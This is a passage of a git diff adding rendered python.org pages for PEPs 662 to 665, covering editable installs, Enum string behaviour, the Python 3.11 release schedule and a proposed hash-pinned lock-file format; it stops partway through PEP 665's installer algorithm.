This PEP competes with PEP 660 and rejects that proposal because we think the mechanism for achieving an editable installation should live in the frontend rather than the build backend. Furthermore, this approach allows the ecosystem to use alternative means to accomplish the editable installation effect (e.g., inserting paths on sys.path, or symlinks, instead of just the loose wheel mode implied by the backend as described in that PEP).

+

Prominently, PEP 660 does not allow using symlinks to expose code and data files without also extending the wheel file standard with symlink support. It's not clear how the wheel format could be extended to support symlinks that refer not to files within the wheel itself, but to files only available on the local disk. It's important to note that the backend itself (or backend-generated code) must not generate these symlinks (e.g., at interpreter startup time), as that would conflict with the frontend's bookkeeping of what files need to be uninstalled.

+

Finally, PEP 660 adds support only for purelib and platlib files. It purposefully avoids supporting other types of information that the wheel format supports: include, data and scripts. With this PEP's approach the frontend can support these on a best-effort basis via the symlink mechanism (though this feature is not universally available; on Windows it requires enablement). We believe it is beneficial to add best-effort support for these file types, rather than excluding the possibility of supporting them at all.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0662.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0663/index.html b/pep-0663/index.html new file mode 100644 index 00000000000..b4f8e0f5d46 --- /dev/null +++ b/pep-0663/index.html +PEP 663 – Standardizing Enum str(), repr(), and format() behaviors | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 663 – Standardizing Enum str(), repr(), and format() behaviors

+
+
Author:
+
Ethan Furman <ethan at stoneleaf.us>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Rejected
+
Type:
+
Informational
+
Created:
+
30-Jun-2021
+
Python-Version:
+
3.11
+
Post-History:
+
20-Jul-2021, 02-Nov-2021
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Update the repr(), str(), and format() of the various Enum types +to better match their intended purpose. For example, IntEnum will have +its str() change to match its format(), while a user-mixed int-enum +will have its format() match its str(). In all cases, an enum’s +str() and format() will be the same (unless the user overrides +format()).

+

Add a global enum decorator which changes the str() and repr() (and +format()) of the decorated enum to be a valid global reference: i.e. +re.IGNORECASE instead of <RegexFlag.IGNORECASE: 2>.

+
+
+

Motivation

+

Having the str() of IntEnum and IntFlag not be the value causes +bugs and extra work when replacing existing constants.

+

Having the str() and format() of an enum member be different can be +confusing.

+

The addition of StrEnum, with its requirement that its str() be its value, is inconsistent with the str() of the other provided Enums.

+

The iteration of Flag members, which directly affects their repr(), is +inelegant at best, and buggy at worst.

+
+
+

Rationale

+

Enums are becoming more common in the standard library; being able to recognize +enum members by their repr(), and having that repr() be easy to parse, is +useful and can save time and effort in understanding and debugging code.

+

However, the enums with mixed-in data types (IntEnum, IntFlag, and the new +StrEnum) need to be more backwards compatible with the constants they are +replacing – specifically, str(replacement_enum_member) == str(original_constant) +should be true (and the same for format()).

+

IntEnum, IntFlag, and StrEnum should be as close to a drop-in replacement of +existing integer and string constants as is possible. Towards that goal, the +str() output of each should be its inherent value; e.g. if Color is an +IntEnum:

+
>>> Color.RED
+<Color.RED: 1>
+>>> str(Color.RED)
+'1'
+>>> format(Color.RED)
+'1'
+
+
+

Note that format() already produces the correct output, only str() needs +updating.

+

As much as possible, the str(), repr(), and format() of enum members +should be standardized across the standard library. However, up to Python 3.10 +several enums in the standard library have a custom str() and/or repr().

+

The repr() of Flag currently includes aliases, which it should not; fixing that +will, of course, already change its repr() in certain cases.

+
+
+

Specification

+

There are three broad categories of enum usage:

+
    +
  • simple: Enum or Flag +a new enum class is created with no data type mixins
  • +
  • drop-in replacement: IntEnum, IntFlag, StrEnum +a new enum class is created which also subclasses int or str and uses +int.__str__ or str.__str__
  • +
  • user-mixed enums and flags +the user creates their own integer-, float-, str-, whatever-enums instead of +using enum.IntEnum, etc.
  • +
+

There are also two styles:

+
    +
  • normal: the enumeration members remain in their classes and are accessed as +classname.membername, and the class name shows in their repr() and +str() (where appropriate)
  • +
  • global: the enumeration members are copied into their module’s global +namespace, and their module name shows in their repr() and str() +(where appropriate)
  • +
+

Some sample enums:

+
# module: tools.py
+
+class Hue(Enum):  # or IntEnum
+    LIGHT = -1
+    NORMAL = 0
+    DARK = +1
+
+class Color(Flag):  # or IntFlag
+    RED = 1
+    GREEN = 2
+    BLUE = 4
+
+class Grey(int, Enum):  # or (int, Flag)
+    BLACK = 0
+    WHITE = 1
+
+
+

Using the above enumerations, the following two tables show the old and new +output (blank cells indicate no change):

style    category     version  enum repr()       enum str()   enum format()
normal   simple       3.10
                      new
         user mixed   3.10                                    1
                      new                                     Grey.WHITE
         int drop-in  3.10                       Hue.LIGHT
                      new                        -1
global   simple       3.10     <Hue.LIGHT: -1>   Hue.LIGHT    Hue.LIGHT
                      new      tools.LIGHT       LIGHT        LIGHT
         user mixed   3.10     <Grey.WHITE: 1>   Grey.WHITE   Grey.WHITE
                      new      tools.WHITE       WHITE        WHITE
         int drop-in  3.10     <Hue.LIGHT: -1>   Hue.LIGHT
                      new      tools.LIGHT       -1
style    category     version  flag repr()            flag str()             flag format()
normal   simple       3.10     <Color.RED|GREEN: 3>   Color.RED|GREEN        Color.RED|GREEN
                      new      <Color(3): RED|GREEN>  Color.RED|Color.GREEN  Color.RED|Color.GREEN
         user mixed   3.10     <Grey.WHITE: 1>                               1
                      new      <Grey(1): WHITE>                              Grey.WHITE
         int drop-in  3.10     <Color.RED|GREEN: 3>   Color.RED|GREEN
                      new      <Color(3): RED|GREEN>  3
global   simple       3.10     <Color.RED|GREEN: 3>   Color.RED|GREEN        Color.RED|GREEN
                      new      tools.RED|tools.GREEN  RED|GREEN              RED|GREEN
         user mixed   3.10     <Grey.WHITE: 1>        Grey.WHITE             1
                      new      tools.WHITE            WHITE                  WHITE
         int drop-in  3.10     <Color.RED|GREEN: 3>   Color.RED|GREEN
                      new      tools.RED|tools.GREEN  3
+

These two tables show the final result:

style    category     enum repr()       enum str()   enum format()
normal   simple       <Hue.LIGHT: -1>   Hue.LIGHT    Hue.LIGHT
         user mixed   <Grey.WHITE: 1>   Grey.WHITE   Grey.WHITE
         int drop-in  <Hue.LIGHT: -1>   -1           -1
global   simple       tools.LIGHT       LIGHT        LIGHT
         user mixed   tools.WHITE       WHITE        WHITE
         int drop-in  tools.LIGHT       -1           -1
style    category     flag repr()            flag str()             flag format()
normal   simple       <Color(3): RED|GREEN>  Color.RED|Color.GREEN  Color.RED|Color.GREEN
         user mixed   <Grey(1): WHITE>       Grey.WHITE             Grey.WHITE
         int drop-in  <Color(3): RED|GREEN>  3                      3
global   simple       tools.RED|tools.GREEN  RED|GREEN              RED|GREEN
         user mixed   tools.WHITE            WHITE                  WHITE
         int drop-in  tools.RED|tools.GREEN  3                      3
+

As can be seen, repr() is primarily affected by whether the members are +global, while str() is affected by being global or by being a drop-in +replacement, with the drop-in replacement status having a higher priority. +Also, the basic repr() and str() have changed for flags as the old +style was flawed.

+
+
+

Backwards Compatibility

+

Backwards compatibility of stringified objects is not guaranteed across major +Python versions, and there will be backwards compatibility breaks where +software uses the repr(), str(), and format() output of enums in +tests, documentation, data structures, and/or code generation.

+

Normal usage of enum members will not change: re.ASCII can still be used +as re.ASCII and will still compare equal to 256.

+

If the previous output needs to be maintained, for example to ensure +compatibility between different Python versions, software projects will need to +create their own enum base class with the appropriate methods overridden.
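For example, a project could pin the 3.10-era output with a small base class along these lines (a sketch, not a recommendation from this PEP):

import enum

class CompatIntEnum(enum.IntEnum):
    """Sketch: keep the 3.10-era IntEnum output on newer Pythons."""

    def __str__(self):
        return f"{self.__class__.__name__}.{self.name}"  # e.g. Hue.LIGHT

    def __format__(self, format_spec):
        return format(self.value, format_spec)  # e.g. -1

class Hue(CompatIntEnum):
    LIGHT = -1

print(str(Hue.LIGHT), format(Hue.LIGHT))  # Hue.LIGHT -1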

+

Note that by changing the str() of the drop-in category, we will actually +prevent future breakage when IntEnum, et al, are used to replace existing +constants.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0663.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0664/index.html b/pep-0664/index.html new file mode 100644 index 00000000000..c1142e36611 --- /dev/null +++ b/pep-0664/index.html +PEP 664 – Python 3.11 Release Schedule | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 664 – Python 3.11 Release Schedule

+
+
Author:
+
Pablo Galindo Salgado <pablogsal at python.org>
+
Status:
+
Active
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
12-Jul-2021
+
Python-Version:
+
3.11
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.11. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.11 Release Manager: Pablo Galindo Salgado
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

Release Schedule

+
+

3.11.0 schedule

+

Note: the dates below use a 17-month development period that results +in a 12-month release cadence between feature versions, as defined by +PEP 602.

+

Actual:

+
    +
  • 3.11 development begins: Monday, 2021-05-03
  • +
  • 3.11.0 alpha 1: Tuesday, 2021-10-05
  • +
  • 3.11.0 alpha 2: Tuesday, 2021-11-02
  • +
  • 3.11.0 alpha 3: Wednesday, 2021-12-08
  • +
  • 3.11.0 alpha 4: Friday, 2022-01-14
  • +
  • 3.11.0 alpha 5: Thursday, 2022-02-03
  • +
  • 3.11.0 alpha 6: Monday, 2022-03-07
  • +
  • 3.11.0 alpha 7: Tuesday, 2022-04-05
  • +
  • 3.11.0 beta 1: Sunday, 2022-05-08 +(No new features beyond this point.)
  • +
  • 3.11.0 beta 2: Tuesday, 2022-05-31
  • +
  • 3.11.0 beta 3: Wednesday, 2022-06-01
  • +
  • 3.11.0 beta 4: Monday, 2022-07-11
  • +
  • 3.11.0 beta 5: Tuesday, 2022-07-26
  • +
  • 3.11.0 candidate 1: Monday, 2022-08-08
  • +
  • 3.11.0 candidate 2: Monday, 2022-09-12
  • +
  • 3.11.0 final: Monday, 2022-10-24
  • +
+
+
+

Bugfix releases

+

Actual:

+
    +
  • 3.11.1: Tuesday, 2022-12-06
  • +
  • 3.11.2: Wednesday, 2023-02-08
  • +
  • 3.11.3: Wednesday, 2023-04-05
  • +
  • 3.11.4: Tuesday, 2023-06-06
  • +
  • 3.11.5: Thursday, 2023-08-24
  • +
  • 3.11.6: Monday, 2023-10-02
  • +
  • 3.11.7: Monday, 2023-12-04
  • +
  • 3.11.8: Tuesday, 2024-02-06
  • +
  • 3.11.9: Tuesday, 2024-04-02 (final regular bugfix release with binary +installers)
  • +
+
+
+

Source-only security fix releases

+

Provided irregularly on an “as-needed” basis until October 2027.

+
    +
  • 3.11.10: Saturday, 2024-09-07
  • +
  • 3.11.11: Tuesday, 2024-12-03
  • +
+
+
+

3.11 Lifespan

+

3.11 will receive bugfix updates approximately every 2 months for +approximately 18 months. Some time after the release of 3.12.0 final, +the ninth and final 3.11 bugfix update will be released. After that, +it is expected that security updates (source only) will be released +until 5 years after the release of 3.11.0 final, so until approximately +October 2027.

+
+
+
+

Features for 3.11

+

Some of the notable features of Python 3.11 include:

+
    +
  • PEP 654, Exception Groups and except*.
  • +
  • PEP 657, Enhanced error locations in tracebacks.
  • +
  • PEP 680, Support for parsing TOML in the standard library
  • +
  • Python 3.11 is up to 10-60% faster than Python 3.10. On average, we measured +a 1.25x speedup on the standard benchmark suite. See Faster CPython for +details.
  • +
+

Typing features:

+
    +
  • PEP 646, Variadic generics.
  • +
  • PEP 655, Marking individual TypedDict items as required or potentially-missing.
  • +
  • PEP 673, Self type.
  • +
  • PEP 675, Arbitrary literal string type.
  • +
  • PEP 681, Dataclass transforms
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0664.rst

+

Last modified: 2024-12-05 19:08:36 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0665/index.html b/pep-0665/index.html new file mode 100644 index 00000000000..43c359e7bbc --- /dev/null +++ b/pep-0665/index.html +PEP 665 – A file format to list Python dependencies for reproducibility of an application | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 665 – A file format to list Python dependencies for reproducibility of an application

+
+
Author:
+
Brett Cannon <brett at python.org>, +Pradyun Gedam <pradyunsg at gmail.com>, +Tzu-ping Chung <uranusjr at gmail.com>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
29-Jul-2021
+
Post-History:
+
29-Jul-2021, 03-Nov-2021, 25-Nov-2021
+
Superseded-By:
+
751
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP was rejected due to a lukewarm reception from the community, stemming from the lack of source distribution support.

+
+
+

Abstract

+

This PEP specifies a file format for listing the Python package installation requirements of an application, and the relations between the specified requirements. The list of requirements is considered exhaustive for the installation target, and thus requires no information beyond the platform being installed for and the file itself. The file format is flexible enough to allow installing the requirements across different platforms, which allows for reproducibility on multiple platforms from the same file.

+
+
+

Terminology

+

There are several terms whose definition must be agreed upon in order +to facilitate a discussion on the topic of this PEP.

+

A package is something you install as a dependency and use via the +import system. The packages on PyPI are an example of this.

+

An application or app is an end product that other external code +does not directly rely on via the import system (i.e. they are +standalone). Desktop applications, command-line tools, etc. are +examples of applications.

+

A lock file records the packages that are to be installed for an app. Traditionally, the exact version of the package to be installed is specified by a lock file, but specified packages are not always installed on a given platform (according to a filtering logic described in a later section), which enables the lock file to describe reproducibility across multiple platforms. Examples of this are package-lock.json from npm, Poetry.lock from Poetry, etc.

+

Locking is the act of taking the input of the packages an app +depends on and producing a lock file from that.

+

A locker is a tool which produces a lock file.

+

An installer consumes a lock file to install what the lock file +specifies.

+
+
+

Motivation

+

Applications want reproducible installs for a few reasons (we are not +worrying about package development, integration into larger systems +that would handle locking dependencies external to the Python +application, or other situations where flexible installation +requirements are desired over strict, reproducible installations).

+

One, reproducibility eases development. When you and your fellow +developers all end up with the same files on a specific platform, you +make sure you are all developing towards the same experience for the +application. You also want your users to install the same files as +you expect to guarantee the experience is the same as you developed +for them.

+

Two, you want to be able to reproduce what gets installed across +multiple platforms. Thanks to Python’s portability across operating +systems, CPUs, etc., it is very easy and often desirable to create +applications that are not restricted to a single platform. Thus, you +want to be flexible enough to allow for differences in your package +dependencies between platforms, while still having consistency +and reproducibility on any one specific platform.

+

Three, reproducibility is more secure. When you control exactly what +files are installed, you can make sure no malicious actor is +attempting to slip nefarious code into your application (i.e. some +supply chain attacks). By using a lock file which always leads to +reproducible installs, we can avoid certain risks entirely.

+

Four, relying on the wheel file format provides reproducibility without requiring build tools to support reproducibility themselves. Thanks to wheels being static and not executing code as part of installation, wheels always lead to a reproducible result. Compare this to source distributions (aka sdists) or source trees, which, due to their inherent code execution, only lead to a reproducible install if their build tool supports reproducibility. Unfortunately the vast majority of build tools do not support reproducible builds, so this PEP helps alleviate that issue by only supporting wheels as a package format.

+

This PEP proposes a standard for a lock file, as the current solutions +don’t meet the outlined goals. Today, the closest we come to a lock +file standard is the requirements file format from pip. +Unfortunately, that format does not lead to inherently reproducible +installs (it requires optional features both in the requirements file +and the installer itself, to be discussed later).

+

The community itself has also shown a need for lock files based on the +fact that multiple tools have independently created their own lock +file formats:

+
    +
1. PDM
2. pip-tools
3. Pipenv
4. Poetry
5. Pyflow
+

Unfortunately, those tools all use differing lock file formats. This +means tooling around these tools must be unique. This impacts tooling +such as code editors and hosting providers, which want to be as +flexible as possible when it comes to accepting a user’s application +code, but also have a limit as to how much development resources they +can spend to add support for yet another lock file format. A +standardized format would allow tools to focus their work on a single +target, and make sure that workflow decisions made by developers +outside of the lock file format are of no concern to e.g. hosting +providers.

+

Other programming language communities have also shown the usefulness +of lock files by developing their own solution to this problem. Some +of those communities include:

+
    +
1. Dart
2. npm/Node
3. Go
4. Rust
+

The trend in programming languages in the past decade seems to have +been toward providing a lock file solution.

+
+
+

Rationale

+
+

File Format

+

We wanted the file format to be easy to read as a diff when auditing +a change to the lock file. As such, and thanks to PEP 518 and +pyproject.toml, we decided to go with the TOML file format.

+
+
+

Secure by Design

+

Viewing the requirements file format as the closest we have to a lock file standard, there are a few issues with the file format when it comes to security. First is that the file format simply does not require you to specify the exact version of a package. This is why tools like pip-tools exist, to help manage that for users of requirements files.

+

Second, you must opt into specifying what files are acceptable to be installed by using the --hash argument for a specific dependency. This is also optional with pip-tools, as it requires specifying the --generate-hashes CLI argument. Furthermore, pip requires the --require-hashes flag to make sure no dependencies lack a hash to check.

+

Third, even when you control what files may be installed, it does not +prevent other packages from being installed. If a dependency is not +listed in the requirements file, pip will happily go searching for a +file to meet that need. You must specify --no-deps as an +argument to pip to prevent unintended dependency resolution outside +of the requirements file.

+

Fourth, the format allows for installing a source distribution file (aka “sdist”). By its very nature, installing an sdist requires executing arbitrary Python code, meaning that there is no control over what files may be installed. Only by specifying --only-binary :all: can you guarantee that pip will only use a wheel file for each package.

+

To recap, in order for a requirements file to be as secure as what is +being proposed, a user should always do the following steps:

+
    +
1. Use pip-tools and its command pip-compile --generate-hashes
2. Install the requirements file using pip install --require-hashes --no-deps --only-binary :all:
+

Critically, all of those flags, and both the specificity and exhaustiveness of what to install that pip-tools provides, are optional for requirements files.

+

As such, the proposal raised in this PEP is secure by design, which combats some supply chain attacks. Hashes for the files which would be installed are required. You can only install from wheels, to unambiguously define what files will be placed in the file system. Installers must lead to a deterministic installation from a lock file for a given platform. All of this leads to a reproducible installation which you can deem trustworthy (when you have audited the lock file and what it lists).

+
+
+

Cross-Platform

+

Various projects which already have a lock file, like PDM and +Poetry, provide a lock file which is cross-platform. This allows +for a single lock file to work on multiple platforms while still +leading to the exact same top-level requirements to be installed +everywhere with the installation being consistent/unambiguous on +each platform.

+

As to why this is useful, let’s use an example involving PyWeek +(a week-long game development competition). Assume you are developing +on Linux, while someone you choose to partner with is using macOS. +Now assume the judges are using Windows. How do you make sure everyone +is using the same top-level dependencies, while allowing for any +platform-specific requirements (e.g. a package requires a helper +package under Windows)?

+

With a cross-platform lock file, you can make sure that the key +requirements are met consistently across all platforms. You can then +also make sure that all users on the same platform get the same +reproducible installation.

+
+
+

Simple Installer

+

The separation of concerns between a locker and an installer allows an installer to perform a much simpler operation. As such, it not only makes installers easier to write, but also helps ensure installers create unambiguous, reproducible installations correctly.

+

The installer can also expend less computation/energy in creating the +installation. This is beneficial not only for faster installs, but +also from an energy consumption perspective, as installers are +expected to be run more often than lockers.

+

This has led to a design where the locker must do more work upfront, to the benefit of installers. It also means the complexity of package dependencies is simpler and easier to comprehend in a lock file, which helps avoid ambiguity.

+
+
+
+

Specification

+
+

Details

+

Lock files MUST use the TOML file format. This not only prevents the +need to have another file format in the Python packaging ecosystem +thanks to its adoption by PEP 518 for pyproject.toml, but also +assists in making lock files more human-readable.

+

Lock files MUST end their file names with .pylock.toml. The +.toml part unambiguously distinguishes the format of the file, +and helps tools like code editors support the file appropriately. The +.pylock part distinguishes the file from other TOML files the user +has, to make the logic easier for tools to create functionality +specific to Python lock files, instead of TOML files in general.

+

The following sections are the top-level keys of the TOML file data +format. Any field not listed as required is considered optional.

+
+

version

+

This field is required.

+

The version of the lock file being used. The key MUST be a string +consisting of a number that follows the same formatting as the +Metadata-Version key in the core metadata spec.

+

The value MUST be set to "1.0" until a future PEP allows for a +different value. The introduction of a new optional key to the file +format SHOULD increase the minor version. The introduction of a new +required key or changing the format MUST increase the major version. +How to handle other scenarios is left as a per-PEP decision.

+

Installers MUST warn the user if the lock file specifies a version +whose major version is supported but whose minor version is +unsupported/unrecognized (e.g. the installer supports "1.0", but +the lock file specifies "1.1").

+

Installers MUST raise an error if the lock file specifies a major +version which is unsupported (e.g. the installer supports "1.9" +but the lock file specifies "2.0").
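A sketch of this check, with the supported version hard-coded for illustration:

SUPPORTED_MAJOR, SUPPORTED_MINOR = 1, 0

def check_lock_file_version(value: str) -> None:
    major, minor = (int(part) for part in value.split("."))
    if major != SUPPORTED_MAJOR:
        # Unsupported major version: must be an error.
        raise RuntimeError(f"unsupported lock file version: {value!r}")
    if minor > SUPPORTED_MINOR:
        # Unrecognized minor version: must be a warning.
        print(f"warning: lock file minor version {value!r} is newer than supported")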

+
+
+

created-at

+

This field is required.

+

The timestamp for when the lock file was generated (using TOML’s +native timestamp type). It MUST be recorded using the UTC time zone to +avoid ambiguity.

+

If the SOURCE_DATE_EPOCH environment variable is set, it MUST be used +as the timestamp by the locker. This facilitates reproducibility of +the lock file itself.
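For illustration, a locker might compute the timestamp like this:

import datetime
import os

epoch = os.environ.get("SOURCE_DATE_EPOCH")
if epoch is not None:
    # Honor SOURCE_DATE_EPOCH for reproducible lock files.
    created_at = datetime.datetime.fromtimestamp(int(epoch), tz=datetime.timezone.utc)
else:
    created_at = datetime.datetime.now(tz=datetime.timezone.utc)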

+
+
+

[tool]

+

Tools may create their own sub-tables under the tool table. The +rules for this table match those for pyproject.toml and its +[tool] table from the build system declaration spec.

+
+
+

[metadata]

+

This table is required.

+

A table containing data applying to the overall lock file.

+
+
metadata.marker
+

A key storing a string containing an environment marker as +specified in the dependency specifier spec.

+

The locker MAY specify an environment marker which specifies any +restrictions the lock file was generated under.

+

If the installer is installing for an environment which does not +satisfy the specified environment marker, the installer MUST raise an +error as the lock file does not support the target installation +environment.

+
+
+
metadata.tag
+

A key storing a string specifying platform compatibility tags +(i.e. wheel tags). The tag MAY be a compressed tag set.

+

If the installer is installing for an environment which does not +satisfy the specified tag (set), the installer MUST raise an error +as the lock file does not support the targeted installation +environment.

+
+
+
metadata.requires
+

This field is required.

+

An array of strings following the dependency specifier spec. This +array represents the top-level package dependencies of the lock file +and thus the root of the dependency graph.

+
+
+
metadata.requires-python
+

A string specifying the supported version(s) of Python for this lock +file. It follows the same format as that specified for the +Requires-Python field in the core metadata spec.

+
+
+
+

[[package._name_._version_]]

+

This array is required.

+

An array per package and version containing entries for the potential +(wheel) files to install (as represented by _name_ and +_version_, respectively).

+

Lockers MUST normalize a project’s name according to the +simple repository API. If extras are specified as part of the +project to install, the extras are to be included in the key name and +are to be sorted in lexicographic order.

+
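For illustration, a locker might build such a key with the packaging project (the helper name is an assumption):

from packaging.utils import canonicalize_name

def package_key(name, extras=()):
    normalized = canonicalize_name(name)  # simple repository API normalization
    if extras:
        return f"{normalized}[{','.join(sorted(extras))}]"
    return normalized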

Within the file, the tables for the projects SHOULD be sorted by:

+
    +
1. Project/key name in lexicographic order
2. Package version, newest/highest to older/lowest according to the version specifiers spec
3. Optional dependencies (extras) via lexicographic order
4. File name based on the filename field (discussed below)
+

These recommendations are to help minimize diff changes between tool +executions.

+
+
package._name_._version_.filename
+

This field is required.

+

A string representing the base name of the file as represented by an +entry in the array (i.e. what +os.path.basename()/pathlib.PurePath.name represents). This +field is required to simplify installers as the file name is required +to resolve wheel tags derived from the file name. It also guarantees +that the association of the array entry to the file it is meant for is +always clear.

+
+
+
[package._name_._version_.hashes]
+

This table is required.

+

A table with keys specifying a hash algorithm and values as the hash +for the file represented by this entry in the +package._name_._version_ table.

+

Lockers SHOULD list hashes in lexicographic order. This is to help +minimize diff sizes and the potential to overlook hash value changes.

+

An installer MUST only install a file which matches one of the +specified hashes.
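A sketch of that verification (note that hash keys recorded by a locker, such as blake-256 in the example later in this PEP, may need mapping onto hashlib's algorithm names):

import hashlib

def file_matches(data, hashes):
    """True if the file content matches at least one recorded hash."""
    return any(
        hashlib.new(algorithm, data).hexdigest() == expected
        for algorithm, expected in hashes.items()
    )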

+
+
+
package._name_._version_.url
+

A string representing a URL where to get the file.

+

The installer MAY support any schemes it wants for URLs. A URL with no +scheme MUST be assumed to be a local file path (both relative paths to +the lock file and absolute paths). Installers MUST support, at +minimum, HTTPS URLs as well as local file paths.

+

An installer MAY choose to not use the URL to retrieve a file +if a file matching the specified hash can be found using alternative +means (e.g. on the file system in a cache directory).

+
+
+
package._name_._version_.direct
+

A boolean representing whether an installer should consider the +project installed “directly” as specified by the +direct URL origin of installed distributions spec.

+

If the key is true, then the installer MUST follow the +direct URL origin of installed distributions spec for recording +the installation as “direct”.

+
+
+
package._name_._version_.requires-python
+

A string specifying the supported version(s) of Python for this file. It follows the same format as that specified for the Requires-Python field in the core metadata spec.

+
+
+
package._name_._version_.requires
+

An array of strings following the dependency specifier spec which +represent the dependencies of this file.

+
+
+
+
+

Example

+
version = "1.0"
+created-at = 2021-10-19T22:33:45.520739+00:00
+
+[tool]
+# Tool-specific table.
+
+[metadata]
+requires = ["mousebender", "coveragepy[toml]"]
+marker = "sys_platform == 'linux'"  # As an example for coverage.
+requires-python = ">=3.7"
+
+[[package.attrs."21.2.0"]]
+filename = "attrs-21.2.0-py2.py3-none-any.whl"
+hashes.sha256 = "149e90d6d8ac20db7a955ad60cf0e6881a3f20d37096140088356da6c716b0b1"
+url = "https://files.pythonhosted.org/packages/20/a9/ba6f1cd1a1517ff022b35acd6a7e4246371dfab08b8e42b829b6d07913cc/attrs-21.2.0-py2.py3-none-any.whl"
+requires-python = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"
+
+[[package.attrs."21.2.0"]]
+# If attrs had another wheel file (e.g. that was platform-specific),
+# it could be listed here.
+
+[[package."coveragepy[toml]"."6.2.0"]]
+filename = "coverage-6.2-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl"
+hashes.sha256 = "c7912d1526299cb04c88288e148c6c87c0df600eca76efd99d84396cfe00ef1d"
+url = "https://files.pythonhosted.org/packages/da/64/468ca923e837285bd0b0a60bd9a287945d6b68e325705b66b368c07518b1/coverage-6.2-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl"
+requires-python = ">=3.6"
+requires = ["tomli"]
+
+[[package."coveragepy[toml]"."6.2.0"]]
+filename = "coverage-6.2-cp310-cp310-musllinux_1_1_x86_64.whl "
+hashes.sha256 = "276651978c94a8c5672ea60a2656e95a3cce2a3f31e9fb2d5ebd4c215d095840"
+url = "https://files.pythonhosted.org/packages/17/d6/a29f2cccacf2315150c31d8685b4842a6e7609279939a478725219794355/coverage-6.2-cp310-cp310-musllinux_1_1_x86_64.whl"
+requires-python = ">=3.6"
+requires = ["tomli"]
+
+# More wheel files for `coverage` could be listed for more
+# extensive support (i.e. all Linux-based wheels).
+
+[[package.mousebender."2.0.0"]]
+filename = "mousebender-2.0.0-py3-none-any.whl"
+hashes.sha256 = "a6f9adfbd17bfb0e6bb5de9a27083e01dfb86ed9c3861e04143d9fd6db373f7c"
+url = "https://files.pythonhosted.org/packages/f4/b3/f6fdbff6395e9b77b5619160180489410fb2f42f41272994353e7ecf5bdf/mousebender-2.0.0-py3-none-any.whl"
+requires-python = ">=3.6"
+requires = ["attrs", "packaging"]
+
+[[package.packaging."20.9"]]
+filename = "packaging-20.9-py2.py3-none-any.whl"
+hashes.blake-256 = "3e897ea760b4daa42653ece2380531c90f64788d979110a2ab51049d92f408af"
+hashes.sha256 = "67714da7f7bc052e064859c05c595155bd1ee9f69f76557e21f051443c20947a"
+url = "https://files.pythonhosted.org/packages/3e/89/7ea760b4daa42653ece2380531c90f64788d979110a2ab51049d92f408af/packaging-20.9-py2.py3-none-any.whl"
+requires-python = ">=3.6"
+requires = ["pyparsing"]
+
+[[package.pyparsing."2.4.7"]]
+filename = "pyparsing-2.4.7-py2.py3-none-any.whl"
+hashes.sha256 = "ef9d7589ef3c200abe66653d3f1ab1033c3c419ae9b9bdb1240a85b024efc88b"
+url = "https://files.pythonhosted.org/packages/8a/bb/488841f56197b13700afd5658fc279a2025a39e22449b7cf29864669b15d/pyparsing-2.4.7-py2.py3-none-any.whl"
+direct = true  # For demonstration purposes.
+requires-python = ">=2.6, !=3.0.*, !=3.1.*, !=3.2.*"
+
+[[package.tomli."2.0.0"]]
+filename = "tomli-2.0.0-py3-none-any.whl"
+hashes.sha256 = "b5bde28da1fed24b9bd1d4d2b8cba62300bfb4ec9a6187a957e8ddb9434c5224"
+url = "https://files.pythonhosted.org/packages/e2/9f/5e1557a57a7282f066351086e78f87289a3446c47b2cb5b8b2f614d8fe99/tomli-2.0.0-py3-none-any.whl"
+requires-python = ">=3.7"
+
+
+
+
+

Expectations for Lockers

+

Lockers MUST create lock files for which a topological sort of the +packages which qualify for installation on the specified platform +results in a graph for which only a single version of any package +qualifies for installation and there is at least one compatible file +to install for each package. This leads to a lock file for any +supported platform where the only decision an installer can make +is what the “best-fitting” wheel is to install (which is discussed +below).

+
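As a rough illustration of the single-version and at-least-one-file requirements, a locker (or an auditor) might validate a candidate lock with a sketch like the following; graphlib is from the standard library, while the graph and files structures are hypothetical parsed forms of the lock data, not anything defined by this PEP.

+
from graphlib import TopologicalSorter
+
+def validate_lock(graph, files):
+    # graph: {(name, version): {(dep, dep_version), ...}} restricted to
+    # packages qualifying on the target platform (hypothetical structure).
+    # files: {(name, version): [file table, ...]} from the lock file.
+    seen = {}
+    for name, version in TopologicalSorter(graph).static_order():
+        if seen.setdefault(name, version) != version:
+            raise ValueError(f"multiple versions of {name} qualify")
+        if not files.get((name, version)):
+            raise ValueError(f"no compatible file for {name} {version}")
+
+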

Lockers are expected to utilize metadata.marker, metadata.tag, +and metadata.requires-python as appropriate as well as environment +markers specified via requires and Python version requirements via +requires-python to enforce this result for installers. Put another +way, the information used in the lock file is not expected to be +pristine/raw from the locker’s input and instead is to be changed as +necessary to the benefit of the locker’s goals.

+
+
+

Expectations for Installers

+

The expected algorithm for resolving what to install is as follows (a +rough Python sketch appears after the list):

+
    +
  1. Construct a dependency graph based on the data in the lock file +with metadata.requires as the starting/root point.
  2. +
